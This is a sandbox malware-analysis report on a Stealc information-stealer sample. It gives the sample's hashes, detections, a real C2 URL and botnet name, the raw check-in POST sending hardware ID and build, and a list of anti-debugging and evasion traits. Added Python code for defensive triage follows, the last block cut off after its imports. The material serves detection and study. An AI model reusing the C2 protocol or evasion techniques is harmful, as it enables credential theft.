Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1532868
MD5: 2e51f94d1dc93d7faaf5da2708fed2de
SHA1: 3e9f21e5c0154ea1eb6ad2829ec86bfdd8ef178c
SHA256: cc6b3fcb986b487a1e9fdb5d0a0fc23ff1ea90cbc55733439c83898eb189773f
Tags: exe, user-Bitsight

Detection

Stealc
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • file.exe (PID: 6756 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 2E51F94D1DC93D7FAAF5DA2708FED2DE)
  • cleanup
Threat name: Stealc
Description: Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, Stealc is a non-resident stealer with flexible data collection settings, and its development relied on other prominent stealers: Vidar, Raccoon, Mars and Redline. Stealc is written in C and uses WinAPI functions. It mainly targets data from web browsers, browser extensions and desktop cryptocurrency wallet applications, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers: sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.
Attribution: No attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc
Malware configuration: {"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}

Yara matches in dumped files:
Source: dump.pcap | Rule: JoeSecurity_Stealc_1 | Description: Yara detected Stealc | Author: Joe Security

Yara matches in memory dumps:
Source: 00000000.00000003.2061630664.0000000005130000.00000004.00001000.00020000.00000000.sdmp | Rule: JoeSecurity_Stealc | Description: Yara detected Stealc | Author: Joe Security
Source: 00000000.00000002.2102958941.000000000130E000.00000004.00000020.00020000.00000000.sdmp | Rule: JoeSecurity_Stealc | Description: Yara detected Stealc | Author: Joe Security
Source: 00000000.00000002.2101950818.00000000002E1000.00000040.00000001.01000000.00000003.sdmp | Rule: JoeSecurity_Stealc | Description: Yara detected Stealc | Author: Joe Security
Source: Process Memory Space: file.exe PID: 6756 | Rule: JoeSecurity_PowershellDownloadAndExecute | Description: Yara detected Powershell download and execute | Author: Joe Security
Source: Process Memory Space: file.exe PID: 6756 | Rule: JoeSecurity_Stealc | Description: Yara detected Stealc | Author: Joe Security

Yara matches in unpacked PEs:
Source: 0.2.file.exe.2e0000.0.unpack | Rule: JoeSecurity_Stealc | Description: Yara detected Stealc | Author: Joe Security

No Sigma rule has matched

Suricata alert:
Timestamp: 2024-10-14T03:58:03.786676+0200 | SID: 2044243 | Severity: 1 | Classtype: Malware Command and Control Activity Detected | Source: 192.168.2.5:49704 | Destination: 185.215.113.37:80 | Protocol: TCP


                AV Detection

Source: file.exe | Avira: detected
Source: http://185.215.113.37/ | URL Reputation: Label: malware
Source: http://185.215.113.37 | URL Reputation: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.php | URL Reputation: Label: malware
Source: 0.2.file.exe.2e0000.0.unpack | Malware Configuration Extractor: StealC {"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}
Source: http://185.215.113.37/x | Virustotal: Detection: 16%
Source: http://185.215.113.37/e2b1563c6670f193.php= | Virustotal: Detection: 16%
Source: http://185.215.113.37/e2b1563c6670f193.phpr | Virustotal: Detection: 16%
Source: http://185.215.113.37/D | Virustotal: Detection: 16%
Source: http://185.215.113.37/v | Virustotal: Detection: 16%
Source: http://185.215.113.37/e2b1563c6670f193.phpe | Virustotal: Detection: 16%
Source: http://185.215.113.37/e2b1563c6670f193.phpU | Virustotal: Detection: 16%
Source: http://185.215.113.37/e2b1563c6670f193.phpS | Virustotal: Detection: 16%
Source: http://185.215.113.37/e2b1563c6670f193.phpX | Virustotal: Detection: 16%
Source: file.exe | Virustotal: Detection: 53%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: file.exe | Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_002EC820 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_002E7240 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_002E9AC0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_002E9B60 CryptUnprotectData,LocalAlloc,LocalFree
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_002F8EA0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_002F38B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_002F4910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_002EDA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_002EE430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_002EED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_002F4570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_002EDE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_002EBE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_002F3EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_002EF6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_002EF68A FindFirstFileA
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_002E16D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose

                Networking

Source: Network traffic | Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.5:49704 -> 185.215.113.37:80
Source: Malware configuration extractor | URLs: http://185.215.113.37/e2b1563c6670f193.php
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | Host: 185.215.113.37 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1 | Content-Type: multipart/form-data; boundary=----GIEHJDHCBAEHJJJKKFID | Host: 185.215.113.37 | Content-Length: 211 | Connection: Keep-Alive | Cache-Control: no-cache | Data Raw: 2d 2d 2d 2d 2d 2d 47 49 45 48 4a 44 48 43 42 41 45 48 4a 4a 4a 4b 4b 46 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 31 34 37 33 46 39 33 44 46 30 30 33 32 38 33 38 39 36 32 36 34 0d 0a 2d 2d 2d 2d 2d 2d 47 49 45 48 4a 44 48 43 42 41 45 48 4a 4a 4a 4b 4b 46 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 47 49 45 48 4a 44 48 43 42 41 45 48 4a 4a 4a 4b 4b 46 49 44 2d 2d 0d 0a | Data Ascii: ------GIEHJDHCBAEHJJJKKFID Content-Disposition: form-data; name="hwid" E1473F93DF003283896264 ------GIEHJDHCBAEHJJJKKFID Content-Disposition: form-data; name="build" doma ------GIEHJDHCBAEHJJJKKFID--
Source: Joe Sandbox View | IP Address: 185.215.113.37
Source: Joe Sandbox View | ASN Name: WHOLESALECONNECTIONSNL
Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.37 (reported 7 times)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_002E4880 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | Host: 185.215.113.37 | Connection: Keep-Alive | Cache-Control: no-cache
Source: unknown | HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1 (same headers and 211-byte multipart body as the POST listed above)
Source: file.exe, 00000000.00000002.2102958941.000000000130E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37
Source: file.exe, 00000000.00000002.2102958941.0000000001352000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/D
Source: file.exe, 00000000.00000002.2102958941.0000000001352000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2102958941.000000000130E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php
Source: file.exe, 00000000.00000002.2102958941.0000000001366000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php=
Source: file.exe, 00000000.00000002.2102958941.0000000001352000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpS
Source: file.exe, 00000000.00000002.2102958941.0000000001366000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpU
Source: file.exe, 00000000.00000002.2102958941.0000000001352000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpX
Source: file.exe, 00000000.00000002.2102958941.0000000001366000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpe
Source: file.exe, 00000000.00000002.2102958941.0000000001366000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpr
Source: file.exe, 00000000.00000002.2102958941.0000000001352000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/v
Source: file.exe, 00000000.00000002.2102958941.000000000130E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/x
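The check-in above is small enough to take apart by hand, and the traits the signatures key on (no User-Agent, a bare-IP Host that needed no DNS lookup, a POST to a 16-hex-character .php gate carrying only hwid and build) are easy to test for. The Python below is an added example, not part of the Joe Sandbox report and not Stealc's own code: it rebuilds the two captured requests from the report's text (the POST body is the report's "Data Raw" hex, 211 bytes; CRLF framing and header order are assumed), parses the multipart/form-data body, and reconstructs the C2 URL so it can be compared with the extracted configuration. The gate-path pattern and the exact-field check are heuristics chosen for this example, not rules quoted from the report.

```python
"""Triage of the Stealc C2 check-in captured in this report (added example)."""
import re
from typing import Dict, Tuple

# Both requests are rebuilt from the report's "HTTP traffic detected" lines. The POST body
# is the report's "Data Raw" hex (211 bytes); CRLF framing and header order are assumed.
GET_REQUEST = (
    b"GET / HTTP/1.1\r\n"
    b"Host: 185.215.113.37\r\n"
    b"Connection: Keep-Alive\r\n"
    b"Cache-Control: no-cache\r\n"
    b"\r\n"
)
POST_BODY = bytes.fromhex("""
2d 2d 2d 2d 2d 2d 47 49 45 48 4a 44 48 43 42 41 45 48 4a 4a 4a 4b 4b 46 49 44 0d 0a
43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a
45 31 34 37 33 46 39 33 44 46 30 30 33 32 38 33 38 39 36 32 36 34 0d 0a
2d 2d 2d 2d 2d 2d 47 49 45 48 4a 44 48 43 42 41 45 48 4a 4a 4a 4b 4b 46 49 44 0d 0a
43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a
64 6f 6d 61 0d 0a
2d 2d 2d 2d 2d 2d 47 49 45 48 4a 44 48 43 42 41 45 48 4a 4a 4a 4b 4b 46 49 44 2d 2d 0d 0a
""")
POST_REQUEST = (
    b"POST /e2b1563c6670f193.php HTTP/1.1\r\n"
    b"Content-Type: multipart/form-data; boundary=----GIEHJDHCBAEHJJJKKFID\r\n"
    b"Host: 185.215.113.37\r\n"
    b"Content-Length: 211\r\n"
    b"Connection: Keep-Alive\r\n"
    b"Cache-Control: no-cache\r\n"
    b"\r\n"
) + POST_BODY

GATE_PATH = re.compile(r"^/[0-9a-f]{16}\.php$")  # heuristic matching the gate in the extracted config
BARE_IPV4 = re.compile(r"^\d{1,3}(?:\.\d{1,3}){3}$")


def parse_http_request(raw: bytes) -> Tuple[str, str, Dict[str, str], bytes]:
    """Split a raw HTTP/1.1 request into method, path, lower-cased header map and body."""
    head, _, body = raw.partition(b"\r\n\r\n")
    request_line, *header_lines = head.split(b"\r\n")
    method, path, _version = request_line.decode("ascii").split(" ")
    headers: Dict[str, str] = {}
    for line in header_lines:
        name, _, value = line.decode("latin-1").partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, path, headers, body


def parse_multipart(body: bytes, content_type: str) -> Dict[str, bytes]:
    """Return {field name: value} for a multipart/form-data body (RFC 7578 framing)."""
    match = re.search(r'boundary=("?)([^";]+)\1', content_type)
    if not match:
        return {}
    delimiter = b"--" + match.group(2).encode("ascii")
    fields: Dict[str, bytes] = {}
    for part in body.split(delimiter)[1:]:
        if part.startswith(b"--"):
            break  # closing delimiter "--boundary--"
        part_head, _, value = part.lstrip(b"\r\n").partition(b"\r\n\r\n")
        name = re.search(rb'name="([^"]*)"', part_head)
        if name:
            # the CRLF before the next delimiter belongs to the delimiter, not to the value
            fields[name.group(1).decode("ascii")] = value[:-2] if value.endswith(b"\r\n") else value
    return fields


def triage_checkin(raw: bytes) -> dict:
    """Extract the C2 URL and bot fields, and list the traits the report's signatures key on."""
    method, path, headers, body = parse_http_request(raw)
    fields = parse_multipart(body, headers.get("content-type", ""))
    findings = []
    if "user-agent" not in headers:
        findings.append("no User-Agent header")          # "HTTP GET or POST without a user agent"
    if BARE_IPV4.match(headers.get("host", "")):
        findings.append("Host is a bare IPv4 address")   # "TCP traffic ... without corresponding DNS query"
    if method == "POST" and GATE_PATH.match(path):
        findings.append("POST to a 16-hex-character .php gate")
    if set(fields) == {"hwid", "build"}:
        findings.append("multipart body carries exactly hwid and build")
    declared = headers.get("content-length")
    return {
        "c2": f"http://{headers.get('host', '')}{path}",
        "hwid": fields["hwid"].decode("ascii") if "hwid" in fields else None,
        "build": fields["build"].decode("ascii") if "build" in fields else None,
        "content_length_ok": declared is None or int(declared) == len(body),
        "findings": findings,
    }
```

Run against POST_REQUEST the reconstructed C2 is http://185.215.113.37/e2b1563c6670f193.php, identical to the "C2 url" in the extracted configuration, the build field is the configured botnet name "doma", and the declared Content-Length matches the 211 decoded body bytes. The initial GET / beacon carries no body and no User-Agent either, which is why both requests trip the same two header-level checks.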

                System Summary

Source: file.exe | Static PE information: section name: (blank)
Source: file.exe | Static PE information: section name: .rsrc
Source: file.exe | Static PE information: section name: .idata
Source: file.exe | Static PE information: section name: (blank)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00678815
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005B90A2
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00605904
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_006B71E4
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_006AD1FA
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_006BC23D
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_006B3B7C
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_006A9BF1
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00551BF5
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_006B8C42
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00661424
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_006AEC3B
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0063C40F
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0058BD77
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_006BDD3F
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005B9E04
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00577E37
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_006B06E3
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0064C6F0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_006B569E
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00595757
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_006BA7EE
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005D8F91
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_006AB78E
Source: C:\Users\user\Desktop\file.exe | Code function: String function: 002E45C0 appears 316 times
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: file.exe | Static PE information: Section: eyyunreg ZLIB complexity 0.9950084163877054
Source: file.exe, 00000000.00000003.2061630664.0000000005130000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2101950818.00000000002E1000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: =R.SLN6CO6A3TUV4VI7QN) U16F5V0%Q$'V<+59CPLCJJULOYXRHGLPW "53>/1
Source: classification engine | Classification label: mal100.troj.evad.winEXE@1/0@0/1
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_002F9600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_002F3720 CoCreateInstance,MultiByteToWideChar,lstrcpyn
Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\39S1QBU3.htm
Source: C:\Users\user\Desktop\file.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: file.exe | Virustotal: Detection: 53%
Source: file.exe | String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\file.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winmm.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: wininet.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: rstrtmgr.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ntasn1.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: netutils.dll
Source: C:\Users\user\Desktop\file.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
Source: file.exe | Static file information: File size 1838592 > 1048576
Source: file.exe | Static PE information: Raw size of eyyunreg is bigger than: 0x100000 < 0x19ac00

                Data Obfuscation

Source: C:\Users\user\Desktop\file.exe | Unpacked PE file: 0.2.file.exe.2e0000.0.unpack :EW;.rsrc :W;.idata :W; :EW;eyyunreg:EW;cayhnmlo:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;eyyunreg:EW;cayhnmlo:EW;.taggant:EW;
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_002F9860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress
Source: initial sample | Static PE information: section where entry point is pointing to: .taggant
Source: file.exe | Static PE information: real checksum: 0x1c11d0 should be: 0x1caa7f
Source: file.exe | Static PE information: section name: (blank)
Source: file.exe | Static PE information: section name: .rsrc
Source: file.exe | Static PE information: section name: .idata
Source: file.exe | Static PE information: section name: (blank)
Source: file.exe | Static PE information: section name: eyyunreg
Source: file.exe | Static PE information: section name: cayhnmlo
Source: file.exe | Static PE information: section name: .taggant
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_002FB035 | push ecx; ret | 0_2_002FB048
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0079604E | push ebx; mov dword ptr [esp], esi | 0_2_00796095
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0079604E | push edx; mov dword ptr [esp], 7346EE00h | 0_2_007960B0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00745049 | push edi; mov dword ptr [esp], 456197C7h | 0_2_00745077
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00678815 | push edx; mov dword ptr [esp], edi | 0_2_00678918
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00678815 | push 3BA925FBh; mov dword ptr [esp], ecx | 0_2_0067895A
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007698E6 | push 3A2EB958h; mov dword ptr [esp], ecx | 0_2_0076994E
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007698E6 | push 57A71021h; mov dword ptr [esp], edx | 0_2_0076997F
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007698E6 | push ecx; mov dword ptr [esp], esi | 0_2_007699A1
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007790DD | push edi; mov dword ptr [esp], eax | 0_2_00779146
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0076A0C2 | push edx; mov dword ptr [esp], esp | 0_2_0076A90A
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007548CA | push ebp; mov dword ptr [esp], ecx | 0_2_007548EC
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005B90A2 | push 2D5091F5h; mov dword ptr [esp], esi | 0_2_005B910F
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005B90A2 | push 6959114Ah; mov dword ptr [esp], edx | 0_2_005B9117
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005B90A2 | push ebx; mov dword ptr [esp], 5E15BE84h | 0_2_005B91B8
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005B90A2 | push ebx; mov dword ptr [esp], edx | 0_2_005B91D1
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_006E517D | push ecx; mov dword ptr [esp], eax | 0_2_006E51A2
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_006E517D | push 0AAB8B1Ch; mov dword ptr [esp], ecx | 0_2_006E522B
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0071696F | push ebp; mov dword ptr [esp], edx | 0_2_007169B7
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0054597E | push ebp; mov dword ptr [esp], ebx | 0_2_00545AA3
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00780923 | push ecx; mov dword ptr [esp], eax | 0_2_00780B1E
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00780923 | push 5185675Ah; mov dword ptr [esp], ecx | 0_2_00780C35
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00605904 | push esi; mov dword ptr [esp], eax | 0_2_00605917
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00605904 | push eax; mov dword ptr [esp], edi | 0_2_00605960
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00605904 | push ebp; mov dword ptr [esp], ecx | 0_2_00605B19
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00605904 | push 6D91F3ABh; mov dword ptr [esp], ebx | 0_2_00605B2B
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00605904 | push eax; mov dword ptr [esp], ebx | 0_2_00605B37
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00605904 | push 12AEFA80h; mov dword ptr [esp], ebp | 0_2_00605B65
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007A1114 | push 77707621h; mov dword ptr [esp], ebx | 0_2_007A1165
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_006B71E4 | push ebx; mov dword ptr [esp], ecx | 0_2_006B7255
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_006B71E4 | push 0C5E3BC5h; mov dword ptr [esp], edx | 0_2_006B730B
Source: file.exe | Static PE information: section name: eyyunreg entropy: 7.954155944105544
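The static findings in this section (section names that are blank or meaningless, sections mapped writable and executable, an entry point inside .taggant rather than a code section, a section with 7.95 bits of entropy per byte, and a CheckSum field that does not match the file) are cheap to reproduce without a sandbox. The Python below is an added example, not code from the report or from the sample: it builds a small PE32 whose layout echoes the report (a blank-named code section, a high-entropy W+X "eyyunreg" section, entry point in ".taggant"; the bytes are constructed, not taken from file.exe), then parses it and recomputes OptionalHeader.CheckSum with the imagehlp algorithm so the "real checksum / should be" comparison above can be reproduced on any file. The 7.0-bit entropy threshold and the list of "standard" section names are choices made for this example.

```python
"""Static PE triage reproducing this report's Data Obfuscation checks (added example)."""
import hashlib
import math
import struct
from collections import Counter

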